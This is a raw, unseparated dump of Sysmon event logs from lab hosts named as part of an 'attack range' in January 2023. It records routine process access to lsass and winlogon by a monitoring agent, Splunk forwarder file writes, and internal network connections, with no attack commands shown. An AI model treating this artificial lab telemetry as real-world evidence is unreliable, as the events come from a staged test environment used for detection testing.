Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017367Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.541{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017366Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.539{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017365Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.537{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017364Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:22.535{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000044886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:22.839{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0F3A18722FF0AE43A98FD5231DFD1C7,SHA256=8D4BCB5D4E26F926ACDDCE8662BA97BA8B134F7B57F6F6A1D3540F1286883767,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:23.930{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=802891BF8DE06357F9C935C58F46E617,SHA256=2763DE6610684BD6F1E92FADADF769C3ED7B506A2D8CC6953F62C776E8380E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017396Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:24.059{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C8C7E154A7535371610CD0750348FC6,SHA256=B5C40DD0D621DDE85BFA5E74BC607AB7A7E0EC508CC6C112CE1E4EEBC03FC2F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:22.535{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56405-false10.0.1.12-8000- 10341000x800000000000000017401Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017400Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:25.670{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017399Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:25.670{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017398Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:25.656{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017397Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:25.158{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5ECF18AAEA7C4DB8066A1D133CF006,SHA256=AA54D853D5872356AFFC196AD61ACBFE88E67FA7D4FDF789185980929125E822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:25.015{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED26DA2F6B1CEDBBEAC7370D47FAA1D6,SHA256=ECC7997E15C0A103709BE9C8708FB8E075B814BA9079AA3CA02D6258720B3619,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017403Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:24.076{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50136-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017402Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:26.226{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779C04A07AE95B1E82B0825C7D9F5AB4,SHA256=FE31D9C903248E7E21731F2963E3BD737DDDCDF0FBB5B2041D25CA4DF03883B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:26.571{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A39258DE77B2D2FE356B46A9BA70FBEF,SHA256=41514F92D53A1F0B3C542BB2895CC356D4951BD0C1CA3D1C959FE90FF4799CAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:26.102{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A99CE04201BB78F961D88F40E343A5D5,SHA256=A3E5BE5C848556BDEF10C240DA9672BE2809B07B14E5FA61C0C9564B0A4A90B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017404Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:27.305{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334D986665F4B9BC2FCCAFE69B285E7F,SHA256=E7E4A47BFACB1044EA5E6A96317840036CF7C58DDA98168C74767E807BA18634,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:27.671{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:27.218{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34219A88DD7A9CF8605B15D8CDAD5CE2,SHA256=63F0EFD027E68C27981AB9D93EA30BF2B601794099EC8C41D3DD633557161DF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017405Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:28.389{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FDD8AED898A4DE4550852042C985139,SHA256=D0BF973346D83490A266CC54D20061EA67F06E09BEB0B30DE0D242C74DCEAFBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.960{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.959{FE4C2B44-E538-63C7-6306-00000000AF02}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:28.315{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B793883D72358D5B247A3A642309FE4D,SHA256=3D90A7EEB824DD352054F3D36A54B20B6113B5768E313EB3581115D0A10F476C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017434Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.957{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=CFCCEB76FF397793BF810BFB16E1AB4B,SHA256=B33AB721E15D98FC023ED121939A9F25461017E2A1D55F4047E29936204CB2C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017433Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.807{E5A8D418-E539-63C7-1902-00000000B002}26443316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017432Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E539-63C7-1902-00000000B002}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017431Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 